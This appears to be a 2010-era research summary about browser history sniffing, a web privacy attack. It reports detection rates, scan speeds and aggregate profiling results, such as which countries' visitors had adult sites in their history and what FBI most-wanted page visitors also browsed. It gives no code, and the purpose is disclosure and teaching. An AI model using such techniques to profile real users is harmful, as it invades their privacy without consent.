YOUR BROWSING HISTORY AVAILABLE FOR HACKERS

Real-world Web browser history detection results

For the last six months, this website has served as a tool to teach Internet users about Web browser history detection, which allows any website on the Internet to view the browsing history of most of its viewers.
At the same time, we were analyzing the problem in more detail to determine how many of our visitors were affected by this attack, how difficult it is to scan browsers' histories for visited sites and resources, and how much information can be gathered about most of us in this manner. We're pleased to announce that we'll be presenting our results at the Web 2.0 Security and Privacy 2010 workshop on May 20th in Oakland. You can view the full paper, or read on for the highlights.

Main results

• How many people are affected?
• We analyzed the results from over a quarter of a million people who ran our tests in the last few months, and found that we can detect browsing histories for over 76% of them. All major browsers allow their users' history to be detected, but it seems that users of the more modern browsers such as Safari and Chrome are more affected; we detected visited sites for 82% of Safari users and 94% of Chrome users.
• Visitors with JavaScript turned off are just as vulnerable to history detection as JS-enabled browsers. We detected histories for 77% of such users; for some tests, users without JavaScript had more visited sites detected than others. Read our details page to see why turning off JavaScript or installing NoScript won't help in this case.
• How much information can be gathered?
• While our tests were quite limited, for our test of 5000 most popular websites, we detected an average of 63 visited locations (13 sites and 50 subpages on those sites); the medians were 8 and 17 respectively.
• Almost 10% of our visitors had over 30 visited sites and 120 subpages detected -- heavy Internet users who don't protect themselves are more affected than others.
• We also detected zipcodes our visitors had typed into online forms on sites such as Yahoo! Movies or weather.com for 9.8% of users.
• How easy is it to detect browsing histories?
• The ability to detect visitors' browsing history requires just a few lines of code. Armed with a list of websites to check for, a malicious webmaster can scan over 25 thousand links per second (1.5 million links per minute) in almost every recent browser.
• Most websites and pages you view in your browser can be detected as long as they are kept in your history. Almost every address that was in your browser's address bar can be detected (this includes most pages, including those retrieved using https and some forms with potentialy private information such as your zipcode or search query). Pages won't be detected when they expire from your history (usually after a month or two), or if you manually clear it.

More results and system design details are available in the full paper. If you'd like to learn about steps browsers vendors are taking to address the problem in next-generation browsers, read David Baron's proposal, and associated discussions in the Mozilla forums.
We are still wading through our vast dataset, and will post more results soon. As an example, below is a brief summary of the data about visitors to popular adult websites.

Who visits adult websites?

The ability to detect a Web user's browsing history can be used not only to find out potentially private information about one's browsing habits, but also to make more global comparisons. As an example, we chose to see which of the 243,068 users who tried out top 5,000 popular sites test had been to one of the popular adult destinations online.
The adult websites we checked for all belonged to some of the Web's most popular destinations (such as Alexa and Quantcast) -- overall about 100 of the 5,000 sites. For each country (determined using GeoIP and hostname data) we checked how many users had at least one adult website in their history. We discarded data from countries from which we had fewer than 500 visitors. The chart is shown below.
The geographical correlations are certainly intresting (bonus question: which two EU countries' economies have been under a lot of scrutiny recently?).
Another interesting thing to observe is the low number of visitors to the most popular adult websites from Japan, China and Korea.
We used the same technique to divide US users by the top level domain, shown below. It is uplifting to see such a low number of .gov and .mil users with adult sites in their histories (however, the results from our targeted adult website check of over 8,000 not-safe-for-work sites are a little less optimistic; we'll post them soon).

Please keep in mind that these results suffer from a selection bias, and should not be used as an authoritative reference. However, we have no reasons to otherwise doubt the accuracy of the data so you can still use it to amuse your friends.

Who visits the FBI most wanted list?

In addition to global comparisons, we also performed a more targeted examination of users who visited FBI's Ten Most Wanted Fugitives page. The data was, again, taken from the top5k test; overall number of users who had visited the link was 178. The raw list of other websites visited by those users is available here. Several interesting observations can be made; for example, only 44% of users had visited the main FBI page, which hints that they came from off-site or had the specific page bookmarked. In addition, some less-popular Internet locations were visited by a large number of users from the analyzed group; the averages for torrent sites, adult sites, and 4chan, are significantly higher than for the rest of our data set.

SOURCE